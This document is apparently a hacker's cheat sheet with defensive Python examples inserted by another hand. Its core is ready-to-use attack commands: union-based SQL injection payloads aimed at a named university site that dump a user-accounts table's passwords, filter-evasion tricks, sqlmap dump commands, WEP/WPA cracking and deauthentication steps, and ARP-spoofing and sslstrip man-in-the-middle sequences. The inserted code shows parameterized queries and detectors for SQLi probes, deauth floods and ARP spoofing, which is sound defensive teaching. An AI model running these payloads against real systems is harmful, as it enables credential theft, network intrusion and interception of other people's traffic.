
Union based SQL injection

~~~~~~~~~~~~~~~~~~~

Functions
database() || for finding the database name
version() || for finding the version of the db
user() || for finding the db user the application connects as
group_concat() || for collecting many values into one comma separated string

Step:1 find the parameter value || something=something

Step:2 apply single quote '

EX: www.site.com/products.php?id=15'

Step:3 find number of columns

id=15 order by 1-- || for union based sqli on a numeric (unquoted) parameter
id=15' order by 1-- - || for string based sqli (quoted parameter)
http://www.bzu.edu.pk/departmentindex.php?id=-48'order by 16-- -

Step:4 now find the vulnerable column

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Step:5 Now find the tables

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from information_schema.table_constraints-- -

Step:6 Now find the columns

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from information_schema.columns where table_name='useraccounts'-- -

Step:7 fetching data

uname, upassword || the column names found in Step:6
0x3a || hex for ':' used as a separator between the two values

http://www.bzu.edu.pk/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(uname,0x3a,upassword),8,9,10,11,12,13,14,15 from useraccounts-- -
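Why the single quote in Step:2 breaks the page and why the union payload of Step:7 returns rows from a completely different table comes down to how the query is built. The following is an added example, not code from the author of these notes: it uses Python's built-in sqlite3 with a constructed products/useraccounts database (table names, rows and values are made up) to show the vulnerable string-building query next to the parameterized query that makes every payload above return nothing.

```python
import sqlite3

# Constructed demo schema (not a real site): products is what id=15 looks up,
# useraccounts is the unrelated table the union payload reaches into.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (15, 'lamp', '12.50'), (16, 'desk', '99.00');
        CREATE TABLE useraccounts (uname TEXT, upassword TEXT);
        INSERT INTO useraccounts VALUES ('alice', 'hash-a'), ('bob', 'hash-b');
    """)
    return conn

def vulnerable_lookup(conn, user_id):
    # The pattern behind products.php?id=15: the request parameter is pasted
    # straight into the SQL text, so a quote in it ends the string literal and
    # everything after it is parsed as SQL.
    sql = "SELECT id, name, price FROM products WHERE id='" + user_id + "'"
    return conn.execute(sql).fetchall()

def safe_lookup(conn, user_id):
    # Parameter binding: the value travels as data, never as SQL text, so a
    # quote or a union clause inside it is just characters to compare against.
    sql = "SELECT id, name, price FROM products WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()

def quote_breaks_query(conn, value):
    # Step:2 of the notes: a stray quote makes the database reject the query.
    # A page that shows that database error to the user confirms the injection point.
    try:
        vulnerable_lookup(conn, value)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    payload = "-48' union select uname, upassword, 3 from useraccounts-- -"
    print("quote breaks query:", quote_breaks_query(db, "15'"))
    print("vulnerable:", vulnerable_lookup(db, payload))
    print("parameterized:", safe_lookup(db, payload))
```

The fix is the one line in safe_lookup: the `?` placeholder. Escaping quotes by hand or filtering the word "union" leaves the string-building pattern in place, which is what the version-comment tricks further down exploit.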

For more security (when a filter blocks the plain keyword):

add /*!union*/ select
or
add /*!12345union*/ select

add it wherever it works (MySQL executes what is inside a /*! ... */ version comment, so the query still runs while a simple keyword filter may not see "union select")
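The version-comment forms above work because MySQL executes what is inside /*! ... */ while a filter matching the literal words "union select" does not see them. On the defensive side that means detection has to normalize the request before matching. Added example (not from these notes): a small Python scanner over constructed access-log lines that URL-decodes the query string, strips /*!nnnnn ... */ markers, and then flags the Step:2 quote probe (a quote followed by a server error), Step:3 order-by probes, and the union/information_schema queries from Steps 4 to 6.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in combined-log style (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /products.php?id=15 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /products.php?id=15%27 HTTP/1.1" 500 88
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /products.php?id=15%27%20order%20by%2016--%20- HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /products.php?id=-48%27%20union%20select%201,2,3--%20- HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /products.php?id=-48%27/*!12345union*/select%201,2,3%20from%20information_schema.columns--%20- HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=reunion+selection HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})\b'
)
# /*!union*/ and /*!12345union*/ become plain "union" after this substitution.
VERSION_COMMENT = re.compile(r"/\*!\d*|\*/")
PATTERNS = {
    "union-select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "schema-enum": re.compile(r"\binformation_schema\."),
    "column-count probe": re.compile(r"\border\s+by\s+\d+\s*--"),
}

def normalize(query):
    """Decode, lowercase, drop MySQL version-comment markers, collapse whitespace."""
    s = unquote_plus(query).lower()
    s = VERSION_COMMENT.sub(" ", s)
    return re.sub(r"\s+", " ", s)

def classify(line):
    """Return (ip, path, reasons) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = path.partition("?")[2]
    if not query:
        return None
    norm = normalize(query)
    reasons = [name for name, rx in PATTERNS.items() if rx.search(norm)]
    # Step:2 signature: a quote in the parameter and the application blew up.
    if "'" in norm and int(m.group("status")) >= 500:
        reasons.append("quote probe + server error")
    return (m.group("ip"), path, reasons) if reasons else None

def scan(log_text):
    return [r for r in (classify(l) for l in log_text.splitlines()) if r]

if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG):
        print(ip, reasons, path)
```

The word-boundary anchors keep "reunion selection" from matching, and the decode-then-strip order matters: a filter that looks at the raw URL never sees "union select" in the fifth line at all.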

SQL Map

Assuming shu.co.in/lol.php?id=50
check if the site is vulnerable or not

Step 1: sqlmap.py -u s.in/lol.php?id=50 --dbs //to find the databases
assume database name is sh

Step 2: sqlmap.py -u .co.in/lol.php?id=50 -D sh --tables //to find the tables
assume the table name is users

Step 3: sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users --columns //to find the columns

Step 4: sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump the data

alternative

sqlmap.py -u .co.in/lol.php?id=50 --dump //to dump all databases

or

sqlmap.py -u .co.in/lol.php?id=50 -D sh --dump //to dump the data of a particular database

SQL Map for kali

Assuming sh.co.in/lol.php?id=50
check if the site is vulnerable or not

Step 1: sqlmap -u sh.co.in/lol.php?id=50 --dbs //to find the databases
assume database name is shubham_choudhary

Step 2: sqlmap -u shu.co.in/lol.php?id=50 -D sh --tables //to find the tables
assume the table name is users

Step 3: sqlmap -u sh.co.in/lol.php?id=50 -D sh -T users --columns //to find the columns

Step 4: sqlmap -u sh.co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump the data

alternative

sqlmap -u shu.co.in/lol.php?id=50 --dump //to dump all databases

or

sqlmap -u sh.co.in/lol.php?id=50 -D shubham_choudhary --dump //to dump the data of a particular database

SQL Map for backtrack

Assuming .co.in/lol.php?id=50
check if the site is vulnerable or not

Step 1: python sqlmap.py -u .co.in/lol.php?id=50 --dbs //to find the databases
assume database name is sh

Step 2: python sqlmap.py -u .co.in/lol.php?id=50 -D sh --tables //to find the tables
assume the table name is users

Step 3: python sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users --columns //to find the columns

Step 4: python sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump the data

alternative

python sqlmap.py -u .co.in/lol.php?id=50 --dump //to dump all databases

or

python sqlmap.py -u s.co.in/lol.php?id=50 -D sh --dump //to dump the data of a particular database

Wireless hacking

WI-FI
~~~~
~what is wi-fi?
~what is a guided medium?
data is transferred over a medium that is guided by a wire (cable).
~what is an unguided medium?
data is transferred over an unguided medium (air).

~There are the following types of security (WEP, WPA, WPA2, WPS)

WEP
~~~
Wired Equivalent Privacy

airmon, airodump, aireplay, aircrack
WEP-CRACKING
~~~~~~~~~~

STEP:1->airmon-ng ||display the wireless cards
STEP:2->airmon-ng start wlan0 ||for enabling monitor mode.
STEP:3->airodump-ng mon0 ||for scanning the wi-fi networks
STEP:4->airodump-ng -w abc -c 1 --bssid 00:25:5E:33:FB:7C mon0 ||this is used to select a particular wifi router (channel 1, the given BSSID, capture written to abc-01.cap).
STEP:5->aireplay-ng --deauth 0 -a 00:25:5E:33:FB:7C mon0 ||sends deauthentication frames
STEP:6->aireplay-ng --arpreplay -b 00:25:5E:33:FB:7C mon0 ||ARP request replay
STEP:7->aircrack-ng abc-01.cap

WPA
~~~
STEP 1-6 same as WEP
STEP:7->aircrack-ng -w dc.txt abc-01.cap ||-w gives the wordlist
if an error comes, then use
--ignore-negative-one
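Step:5 in both the WEP and WPA sequences above is the part a wireless IDS can see: a burst of deauthentication frames that carry the access point's own address as transmitter and are sent to the broadcast address. The following is an added example, not from these notes: a Python parser for the 24-byte 802.11 management header and a counter that flags deauth/disassoc floods per transmitter and BSSID. The frames it runs on are constructed inline (the addresses are made-up locally administered ones) and, as an assumption for this example, the radiotap header that monitor-mode captures prepend is taken to be already stripped.

```python
from collections import Counter

# 802.11 management frame subtypes (frame type 0) that tear down a client's session.
DEAUTH = (0, 12)
DISASSOC = (0, 10)
BROADCAST = "ff:ff:ff:ff:ff:ff"

def _mac(b):
    return ":".join(f"{x:02x}" for x in b)

def parse_80211_header(frame):
    """Return (type, subtype, addr1, addr2, addr3) from a raw 802.11 frame.

    Assumes the radiotap header from monitor mode is already stripped (assumption
    for this example), so byte 0 is the frame control field:
    bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype.
    addr1 = receiver, addr2 = transmitter, addr3 = BSSID for management frames.
    """
    if len(frame) < 24:
        return None
    fc = frame[0]
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    return ftype, subtype, _mac(frame[4:10]), _mac(frame[10:16]), _mac(frame[16:22])

def build_mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Constructed test frames (not captured traffic): a minimal 24-byte
    management header plus the 2-byte reason code for deauth/disassoc."""
    to_bytes = lambda m: bytes.fromhex(m.replace(":", ""))
    fc = bytes([subtype << 4, 0])            # type 0 = management, version 0
    frame = fc + b"\x00\x00" + to_bytes(dst) + to_bytes(src) + to_bytes(bssid) + b"\x00\x00"
    if reason is not None:
        frame += reason.to_bytes(2, "little")
    return frame

def detect_deauth_flood(frames, threshold=10):
    """Count deauth/disassoc frames per (transmitter, bssid, receiver) and return
    the triples at or above the threshold. Many broadcast deauths that name the
    AP as transmitter is the on-air signature of --deauth 0; genuine client
    departures are rare and unicast."""
    counts = Counter()
    for f in frames:
        hdr = parse_80211_header(f)
        if hdr is None:
            continue
        ftype, subtype, dst, src, bssid = hdr
        if (ftype, subtype) in (DEAUTH, DISASSOC):
            counts[(src, bssid, dst)] += 1
    return {k: v for k, v in counts.items() if v >= threshold}

if __name__ == "__main__":
    ap = "02:00:00:00:00:01"   # constructed locally administered address
    flood = [build_mgmt_frame(12, BROADCAST, ap, ap, reason=7) for _ in range(25)]
    beacons = [build_mgmt_frame(8, BROADCAST, ap, ap) for _ in range(3)]
    print(detect_deauth_flood(flood + beacons))
```

The threshold is per capture window; a real sensor would reset the counter every few seconds. Networks that enable 802.11w (protected management frames) reject unauthenticated deauth frames outright, which is the mitigation this detector only observes.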

Commands for MITM attack (man-in-the-middle attack)

step 1 : arpspoof -i wlan0/eth0 -t (target 1 ip) (target 2 ip)
ex arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1
step 2 : arpspoof -i wlan0/eth0 -t (target 2 ip) (target 1 ip)
ex arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105

step 3 : urlsnarf
ex urlsnarf -i wlan0
ex urlsnarf //for lan (eth0 port)
step 4 : driftnet
ex driftnet -i wlan0
ex driftnet //for lan (eth0 port)

Commands for MITM attack with sslstrip

Step 1 : echo 1 > /proc/sys/net/ipv4/ip_forward
Step 2 : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Step 3 : arpspoof -i <interface> -t <target IP> <gateway IP>
Step 4 : arpspoof -i <interface> -t <gateway IP> <target IP>
Step 5 : sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log
Step 6 : tail -F /root/Desktop/sslstrip.log
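Both command sequences above (arpspoof on its own, and arpspoof feeding sslstrip) depend on the same thing on the wire: one MAC address answering ARP for two IP addresses at once, and the gateway's address suddenly resolving to a different MAC. That is what a host or a mirror-port sensor can watch for. Added example, not from these notes: a Python detector over (ip, mac) pairs taken from observed ARP replies, with a pinned entry for the gateway. The replies it is fed are constructed (the 192.168.1.1 and 192.168.1.105 addresses come from the examples above; the MACs are made up).

```python
from collections import defaultdict

def detect_arp_spoofing(replies, pinned=None):
    """Scan observed ARP replies, given as (ip, mac) pairs in arrival order.

    pinned: {ip: mac} entries that must never change (e.g. the gateway). A reply
    that contradicts a pinned entry raises an alert and the pinned value is kept.
    Two signals are raised:
      ("ip-mac-change", ip, old_mac, new_mac)   an IP is suddenly answered by a new MAC
      ("one-mac-many-ips", mac, (ip, ...))       one MAC answers for more than one IP,
          which is exactly what the two arpspoof commands above produce together.
    """
    pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
    known = dict(pinned)
    claims = defaultdict(set)
    for ip, mac in known.items():
        claims[mac].add(ip)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        prev = known.get(ip)
        if prev is None:
            known[ip] = mac                 # first sighting: learn it
        elif prev != mac:
            alerts.append(("ip-mac-change", ip, prev, mac))
            if ip not in pinned:
                known[ip] = mac             # unpinned entries follow the latest claim
        before = len(claims[mac])
        claims[mac].add(ip)
        if len(claims[mac]) > 1 and len(claims[mac]) > before:
            alerts.append(("one-mac-many-ips", mac, tuple(sorted(claims[mac]))))
    return alerts

# Constructed sample: the gateway and one host from the examples above, then a
# third MAC claiming both addresses (no real capture was used).
SAMPLE_REPLIES = [
    ("192.168.1.1", "AA:BB:CC:00:00:01"),      # gateway, matches the pinned entry
    ("192.168.1.105", "aa:bb:cc:00:00:05"),    # ordinary host, learned
    ("192.168.1.1", "cc:cc:cc:00:00:99"),      # someone else answers for the gateway
    ("192.168.1.105", "cc:cc:cc:00:00:99"),    # ... and for the host: both directions
    ("192.168.1.1", "cc:cc:cc:00:00:99"),      # arpspoof keeps re-sending
]
PINNED = {"192.168.1.1": "aa:bb:cc:00:00:01"}

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES, PINNED):
        print(alert)
```

On a real host the input would come from the ARP cache or from a packet capture filtered to ARP replies; the pinned gateway entry is the same idea as a static ARP entry, which is also the simplest mitigation for the redirect Steps 3 and 4 rely on.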
